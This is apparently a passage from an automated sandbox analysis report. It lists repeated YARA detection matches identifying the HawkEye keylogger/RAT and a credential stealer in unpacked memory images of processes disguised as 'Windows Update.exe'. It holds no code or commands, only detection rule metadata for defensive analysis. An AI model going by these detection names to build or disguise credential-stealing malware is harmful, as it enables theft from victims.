          Source: 10.1.Windows Update.exe.41ce65.2.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.38c9660.45.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.38c9660.45.raw.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.38c9660.45.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.Windows Update.exe.147b1458.4.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 6.2.Windows Update.exe.147b1458.4.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 6.2.Windows Update.exe.147b1458.4.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.4a26c92.27.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.4a26c92.27.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.5.exe.148b7860.3.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 1.2.5.exe.148b7860.3.raw.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 1.2.5.exe.148b7860.3.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.75c0000.59.raw.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.4ae9c0d.57.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.4ae9c0d.57.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.41ce65.15.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.41ce65.15.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.5.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.0.5.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.0.5.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.1.Windows Update.exe.415058.1.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.1.Windows Update.exe.415058.1.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.1.Windows Update.exe.415058.1.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.5.exe.148a0000.1.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 1.2.5.exe.148a0000.1.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 1.2.5.exe.148a0000.1.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.Windows Update.exe.38cb065.8.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.2.Windows Update.exe.38cb065.8.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.41b460.16.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.41b460.16.raw.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.41b460.16.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.5.exe.415058.16.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.0.5.exe.415058.16.raw.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.0.5.exe.415058.16.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.400000.19.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.400000.19.raw.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.400000.19.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.4aadc72.31.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.4aadc72.31.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.Windows Update.exe.7610000.21.raw.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.2.Windows Update.exe.4ae0000.16.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.2.Windows Update.exe.4ae0000.16.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.2.Windows Update.exe.4ae0000.16.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.Windows Update.exe.49d0e2d.10.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.2.Windows Update.exe.49d0e2d.10.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.1.Windows Update.exe.41b460.3.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.1.Windows Update.exe.41b460.3.raw.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.1.Windows Update.exe.41b460.3.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.5.exe.41ce65.1.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.1.5.exe.41ce65.1.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.415058.14.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.415058.14.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.415058.14.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.Windows Update.exe.147b9265.2.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 6.2.Windows Update.exe.147b9265.2.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.4ae0000.55.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.4ae0000.55.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.4ae0000.55.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.41ce65.11.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.41ce65.11.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5.exe.4b20000.15.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.2.5.exe.4b20000.15.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.2.5.exe.4b20000.15.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.7610000.60.raw.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.415058.14.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.415058.14.raw.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.415058.14.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.1.Windows Update.exe.415058.1.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.1.Windows Update.exe.415058.1.raw.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.1.Windows Update.exe.415058.1.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.4ae8208.58.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.4ae8208.58.raw.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.4ae8208.58.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.Windows Update.exe.4ae8208.18.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.2.Windows Update.exe.4ae8208.18.raw.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.2.Windows Update.exe.4ae8208.18.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.5.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.1.5.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.1.5.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.400000.40.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.400000.40.raw.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.400000.40.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.Windows Update.exe.147b7860.3.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 6.2.Windows Update.exe.147b7860.3.raw.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 6.2.Windows Update.exe.147b7860.3.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.Windows Update.exe.4a56408.12.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.2.Windows Update.exe.4a56408.12.raw.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.2.Windows Update.exe.4a56408.12.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.2.5.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.2.5.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.415058.41.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.415058.41.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.415058.41.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.Windows Update.exe.38c9660.6.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye, date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.2.Windows Update.exe.38c9660.6.raw.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer, date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.2.Windows Update.exe.38c9660.6.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye, author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.49cf428.48.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye, date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.49cf428.48.raw.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer, date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.49cf428.48.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye, author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.5.exe.415058.12.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye, date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.0.5.exe.415058.12.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer, date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.0.5.exe.415058.12.unpack, type: UNPACKEDPE, Matched rule: Hawkeye, author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.415058.12.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye, date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.415058.12.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer, date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.415058.12.unpack, type: UNPACKEDPE, Matched rule: Hawkeye, author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5.exe.4a96408.14.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye, date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.2.5.exe.4a96408.14.raw.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer, date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.2.5.exe.4a96408.14.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye, author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.400000.40.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye, date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
